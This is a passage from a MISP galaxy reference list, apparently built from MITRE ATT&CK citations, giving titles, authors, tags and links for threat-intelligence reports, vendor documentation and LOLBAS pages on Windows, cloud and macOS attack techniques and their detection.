Microsoft Threat Intelligence. (2023, October 3). Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="Microsoft SQL Server"

Table 13299. Table References

Links

https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/

rundll32.exe defense evasion

Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.

The tag is: misp-galaxy:references="rundll32.exe defense evasion"

Table 13300. Table References

Links

https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/

def_ev_win_event_logging

Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.

The tag is: misp-galaxy:references="def_ev_win_event_logging"

Table 13301. Table References

Links

https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/

Kaspersky DeftTorero October 3 2022

Global Research & Analysis Team. (2022, October 3). DeftTorero: tactics, techniques and procedures of intrusions revealed. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="Kaspersky DeftTorero October 3 2022"

Table 13302. Table References

Links

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

TechNet Del

Microsoft. (n.d.). Del. Retrieved April 22, 2016.

The tag is: misp-galaxy:references="TechNet Del"

Table 13303. Table References

Links

https://technet.microsoft.com/en-us/library/cc771049.aspx

Azure Shared Access Signature

Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="Azure Shared Access Signature"

Table 13304. Table References

Links

https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature

Register Deloitte

Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Register Deloitte"

Table 13305. Table References

Links

https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/

Talos Micropsia June 2017

Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Talos Micropsia June 2017"

Table 13306. Table References

Links

https://blog.talosintelligence.com/2017/06/palestine-delphi.html

TrendMicro EarthLusca 2022

Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.

The tag is: misp-galaxy:references="TrendMicro EarthLusca 2022"

Table 13307. Table References

Links

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="Demiguise Guardrail Router Logo"

Table 13308. Table References

Links

https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js

FireEye Hacking Team

FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.

The tag is: misp-galaxy:references="FireEye Hacking Team"

Table 13309. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html

Demystifying Azure AD Service Principals

Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.

The tag is: misp-galaxy:references="Demystifying Azure AD Service Principals"

Table 13310. Table References

Links

https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/

demystifying_ryuk

Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="demystifying_ryuk"

Table 13311. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947

DOJ Iran Indictments September 2020

DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.

The tag is: misp-galaxy:references="DOJ Iran Indictments September 2020"

Table 13312. Table References

Links

https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt

Microsoft GitHub Device Guard CI Policies

Microsoft. (2017, June 16). Deploy code integrity policies: steps. Retrieved June 28, 2017.

The tag is: misp-galaxy:references="Microsoft GitHub Device Guard CI Policies"

Table 13313. Table References

Links

https://github.com/Microsoft/windows-itpro-docs/blob/master/windows/device-security/device-guard/deploy-code-integrity-policies-steps.md

Microsoft Deploying AD Federation

Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Deploying AD Federation"

Table 13314. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs

Apple Kernel Extension Deprecation

Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.

The tag is: misp-galaxy:references="Apple Kernel Extension Deprecation"

Table 13315. Table References

Links

https://developer.apple.com/support/kernel-extensions/

Amazon Describe Instance

Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.

The tag is: misp-galaxy:references="Amazon Describe Instance"

Table 13316. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html

Amazon Describe Instances API

Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Amazon Describe Instances API"

Table 13317. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html

DescribeSecurityGroups - Amazon Elastic Compute Cloud

Amazon Web Services, Inc. . (2022). DescribeSecurityGroups. Retrieved January 28, 2022.

The tag is: misp-galaxy:references="DescribeSecurityGroups - Amazon Elastic Compute Cloud"

Table 13318. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html

Microsoft RunOnceEx APR 2018

Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018.

The tag is: misp-galaxy:references="Microsoft RunOnceEx APR 2018"

Table 13319. Table References

Links

https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key

Designing Daemons Apple Dev

Apple. (n.d.). Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Designing Daemons Apple Dev"

Table 13320. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html

Desk.cpl - LOLBAS Project

LOLBAS. (2022, April 21). Desk.cpl. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Desk.cpl - LOLBAS Project"

Table 13321. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Desk/

Free Desktop Application Autostart Feb 2006

Free Desktop. (2006, February 13). Desktop Application Autostart Specification. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Free Desktop Application Autostart Feb 2006"

Table 13322. Table References

Links

https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html

Desktopimgdownldr.exe - LOLBAS Project

LOLBAS. (2020, June 28). Desktopimgdownldr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Desktopimgdownldr.exe - LOLBAS Project"

Table 13323. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/

CISA AA22-057A Destructive Malware February 2022

CISA. (2022, February 26). Destructive Malware Targeting Organizations in Ukraine. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="CISA AA22-057A Destructive Malware February 2022"

Table 13324. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

Microsoft WhisperGate January 2022

MSTIC. (2022, January 15). Destructive malware targeting Ukrainian organizations. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Microsoft WhisperGate January 2022"

Table 13325. Table References

Links

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

NSA and ASD Detect and Prevent Web Shells 2020

NSA and ASD. (2020, April 3). Detect and Prevent Web Shell Malware. Retrieved July 23, 2021.

The tag is: misp-galaxy:references="NSA and ASD Detect and Prevent Web Shells 2020"

Table 13326. Table References

Links

https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

Microsoft Detect Outlook Forms

Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="Microsoft Detect Outlook Forms"

Table 13327. Table References

Links

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

ADDSecurity DCShadow Feb 2018

Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="ADDSecurity DCShadow Feb 2018"

Table 13328. Table References

Links

https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html

Pace University Detecting DGA May 2017

Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.

The tag is: misp-galaxy:references="Pace University Detecting DGA May 2017"

Table 13329. Table References

Links

http://csis.pace.edu/ctappert/srd2017/2017PDF/d4.pdf

MDSec Detecting DOTNET

MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="MDSec Detecting DOTNET"

Table 13330. Table References

Links

https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/

Cisco DoSdetectNetflow

Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.

The tag is: misp-galaxy:references="Cisco DoSdetectNetflow"

Table 13331. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

RSA2017 Detect and Respond Adair

Adair, S. (2017, February 17). Detecting and Responding to Advanced Threats within Exchange Environments. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="RSA2017 Detect and Respond Adair"

Table 13332. Table References

Links

https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf

Nmap Firewalls NIDS

Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Nmap Firewalls NIDS"

Table 13333. Table References

Links

https://nmap.org/book/firewalls.html

Medium Detecting Attempts to Steal Passwords from Memory

French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="Medium Detecting Attempts to Steal Passwords from Memory"

Table 13334. Table References

Links

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

Endurant CMSTP July 2018

Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.

The tag is: misp-galaxy:references="Endurant CMSTP July 2018"

Table 13335. Table References

Links

http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

Red Canary COR_PROFILER May 2020

Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Red Canary COR_PROFILER May 2020"

Table 13336. Table References

Links

https://redcanary.com/blog/cor_profiler-for-persistence/

NVisio Labs DDE Detection Oct 2017

NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="NVisio Labs DDE Detection Oct 2017"

Table 13337. Table References

Links

https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

Zhang 2013

Zhang, H., Papadopoulos, C., & Massey, D. (2013, April). Detecting encrypted botnet traffic. Retrieved August 19, 2015.

The tag is: misp-galaxy:references="Zhang 2013"

Table 13338. Table References

Links

http://www.netsec.colostate.edu/zhang/DetectingEncryptedBotnetTraffic.pdf

ADSecurity Detecting Forged Tickets

Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="ADSecurity Detecting Forged Tickets"

Table 13339. Table References

Links

https://adsecurity.org/?p=1515

Microsoft Detecting Kerberoasting Feb 2018

Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.

The tag is: misp-galaxy:references="Microsoft Detecting Kerberoasting Feb 2018"

Table 13340. Table References

Links

https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/

Medium Detecting Lateral Movement

French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="Medium Detecting Lateral Movement"

Table 13341. Table References

Links

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

macOS root VNC login without authentication

Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="macOS root VNC login without authentication"

Table 13342. Table References

Links

https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication

Sans Virtual Jan 2016

Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Sans Virtual Jan 2016"

Table 13343. Table References

Links

https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667

Mandiant Azure AD Backdoors

Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Mandiant Azure AD Backdoors"

Table 13344. Table References

Links

https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors

CounterCept PPID Spoofing Dec 2018

Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.

The tag is: misp-galaxy:references="CounterCept PPID Spoofing Dec 2018"

Table 13345. Table References

Links

https://www.countercept.com/blog/detecting-parent-pid-spoofing/

CISA SolarWinds Cloud Detection

CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.

The tag is: misp-galaxy:references="CISA SolarWinds Cloud Detection"

Table 13346. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

Detecting Rclone

Aaron Greetham. (2021, May 27). Detecting Rclone – An Effective Tool for Exfiltration. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Detecting Rclone"

Table 13347. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

Medium Detecting WMI Persistence

French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="Medium Detecting WMI Persistence"

Table 13348. Table References

Links

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

Okta Scatter Swine 2022

Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.

The tag is: misp-galaxy:references="Okta Scatter Swine 2022"

Table 13349. Table References

Links

https://sec.okta.com/scatterswine

Splunk Supernova Jan 2021

Stoner, J. (2021, January 21). Detecting Supernova Malware: SolarWinds Continued. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Splunk Supernova Jan 2021"

Table 13350. Table References

Links

https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html

Microsoft Winnti Jan 2017

Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Microsoft Winnti Jan 2017"

Table 13351. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

Chokepoint preload rootkits

stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Chokepoint preload rootkits"

Table 13352. Table References

Links

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

Sygnia Golden SAML

Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Sygnia Golden SAML"

Table 13353. Table References

Links

https://www.sygnia.co/golden-saml-advisory

FireEye Exchange Zero Days March 2021

Bromiley, M. et al. (2021, March 4). Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities. Retrieved March 9, 2021.

The tag is: misp-galaxy:references="FireEye Exchange Zero Days March 2021"

Table 13354. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html

Microsoft DEV-0537

Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="Microsoft DEV-0537"

Table 13355. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

MSTIC DEV-0537 Mar 2022

MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.

The tag is: misp-galaxy:references="MSTIC DEV-0537 Mar 2022"

Table 13356. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Microsoft Royal ransomware November 2022

MSTIC. (2022, November 17). DEV-0569 finds new ways to deliver Royal ransomware, various payloads. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Microsoft Royal ransomware November 2022"

Table 13357. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

Cisco IOS Forensics Developments

Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Forensics Developments"

Table 13358. Table References

Links

https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf

DeviceCredentialDeployment.exe - LOLBAS Project

LOLBAS. (2021, August 16). DeviceCredentialDeployment.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="DeviceCredentialDeployment.exe - LOLBAS Project"

Table 13359. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/

GitHub mattifestation DeviceGuardBypass

Graeber, M. (2016, November 13). DeviceGuardBypassMitigationRules. Retrieved November 30, 2016.

The tag is: misp-galaxy:references="GitHub mattifestation DeviceGuardBypass"

Table 13360. Table References

Links

https://github.com/mattifestation/DeviceGuardBypassMitigationRules

Devinit.exe - LOLBAS Project

LOLBAS. (2022, January 20). Devinit.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Devinit.exe - LOLBAS Project"

Table 13361. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/

Devtoolslauncher.exe - LOLBAS Project

LOLBAS. (2019, October 4). Devtoolslauncher.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Devtoolslauncher.exe - LOLBAS Project"

Table 13362. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/

devtunnel.exe - LOLBAS Project

LOLBAS. (2023, September 16). devtunnel.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="devtunnel.exe - LOLBAS Project"

Table 13363. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/

Dfshim.dll - LOLBAS Project

LOLBAS. (2018, May 25). Dfshim.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dfshim.dll - LOLBAS Project"

Table 13364. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Dfshim/

Dfsvc.exe - LOLBAS Project

LOLBAS. (2018, May 25). Dfsvc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dfsvc.exe - LOLBAS Project"

Table 13365. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/

dhcp_serv_op_events

Microsoft. (2006, August 31). DHCP Server Operational Events. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="dhcp_serv_op_events"

Table 13366. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)

GitHub Diamorphine

Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.

The tag is: misp-galaxy:references="GitHub Diamorphine"

Table 13367. Table References

Links

https://github.com/m0nad/Diamorphine

diantz.exe_lolbas

Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.

The tag is: misp-galaxy:references="diantz.exe_lolbas"

Table 13368. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

Fortinet Diavol July 2021

Neeamni, D., Rubinfeld, A.. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Fortinet Diavol July 2021"

Table 13369. Table References

Links

https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider

DFIR Diavol Ransomware December 2021

DFIR Report. (2021, December 13). Diavol Ransomware. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="DFIR Diavol Ransomware December 2021"

Table 13370. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

Überwachung APT28 Forfiles June 2015

Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Überwachung APT28 Forfiles June 2015"

Table 13371. Table References

Links

https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/

Microsoft DSE June 2017

Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Microsoft DSE June 2017"

Table 13372. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN

ESET Turla Mosquito Jan 2018

ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="ESET Turla Mosquito Jan 2018"

Table 13373. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf

TechNet Dir

Microsoft. (n.d.). Dir. Retrieved April 18, 2016.

The tag is: misp-galaxy:references="TechNet Dir"

Table 13374. Table References

Links

https://technet.microsoft.com/en-us/library/cc755121.aspx

Frisk DMA August 2016

Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Frisk DMA August 2016"

Table 13375. Table References

Links

https://www.youtube.com/watch?v=fXthwl6ShOg

Redops Syscalls

Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Redops Syscalls"

Table 13376. Table References

Links

https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls

GitHub Disable DDEAUTO Oct 2017

Dormann, W. (2017, October 20). Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="GitHub Disable DDEAUTO Oct 2017"

Table 13377. Table References

Links

https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b

Disable automount for ISO

wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.

The tag is: misp-galaxy:references="Disable automount for ISO"

Table 13378. Table References

Links

https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7

Disable_Win_Event_Logging

dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.

The tag is: misp-galaxy:references="Disable_Win_Event_Logging"

Table 13379. Table References

Links

https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging

GitHub MOTW

wdormann. (2019, August 29). Disable Windows Explorer file associations for Disc Image Mount. Retrieved April 16, 2022.

The tag is: misp-galaxy:references="GitHub MOTW"

Table 13380. Table References

Links

https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7

Apple Disable SIP

Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Apple Disable SIP"

Table 13381. Table References

Links

https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection

Microsoft GPO Bluetooth FEB 2009

Microsoft. (2009, February 9). Disabling Bluetooth and Infrared Beaming. Retrieved July 26, 2018.

The tag is: misp-galaxy:references="Microsoft GPO Bluetooth FEB 2009"

Table 13382. Table References

Links

https://technet.microsoft.com/library/dd252791.aspx

ITSyndicate Disabling PHP functions

Kondratiev, A. (n.d.). Disabling dangerous PHP functions. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="ITSyndicate Disabling PHP functions"

Table 13383. Table References

Links

https://itsyndicate.org/blog/disabling-dangerous-php-functions/

disable_notif_synology_ransom

TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022.

The tag is: misp-galaxy:references="disable_notif_synology_ransom"

Table 13384. Table References

Links

https://twitter.com/TheDFIRReport/status/1498657590259109894

Diskshadow.exe - LOLBAS Project

LOLBAS. (2018, May 25). Diskshadow.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Diskshadow.exe - LOLBAS Project"

Table 13385. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/

Bitdefender FunnyDream Campaign November 2020

Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.

The tag is: misp-galaxy:references="Bitdefender FunnyDream Campaign November 2020"

Table 13386. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

FireEye NETWIRE March 2019

Maniath, S. and Kadam P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="FireEye NETWIRE March 2019"

Table 13387. Table References

Links

https://www.mandiant.com/resources/blog/dissecting-netwire-phishing-campaigns-usage-process-hollowing

Cybereason Dissecting DGAs

Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Cybereason Dissecting DGAs"

Table 13388. Table References

Links

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

FireEye POSHSPY April 2017

Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.

The tag is: misp-galaxy:references="FireEye POSHSPY April 2017"

Table 13389. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

Microsoft DTC

Microsoft. (2011, January 12). Distributed Transaction Coordinator. Retrieved February 25, 2016.

The tag is: misp-galaxy:references="Microsoft DTC"

Table 13390. Table References

Links

https://technet.microsoft.com/en-us/library/cc759136(v=ws.10).aspx

FireEye DLL Search Order Hijacking

Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="FireEye DLL Search Order Hijacking"

Table 13391. Table References

Links

https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html

Mandiant Search Order

Mandiant. (2010, August 31). DLL Search Order Hijacking Revisited. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Mandiant Search Order"

Table 13392. Table References

Links

https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/

Stewart 2014

Stewart, A. (2014). DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Stewart 2014"

Table 13393. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

Dnscmd.exe - LOLBAS Project

LOLBAS. (2018, May 25). Dnscmd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Dnscmd.exe - LOLBAS Project"

Table 13394. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/

Dnscmd Microsoft

Microsoft. (2023, February 3). Dnscmd Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Dnscmd Microsoft"

Table 13395. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd

DNS Dumpster

Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="DNS Dumpster"

Table 13396. Table References

Links

https://dnsdumpster.com/

Talos DNSpionage Nov 2018

Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="Talos DNSpionage Nov 2018"

Table 13397. Table References

Links

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

Unit42 DNS Mar 2019

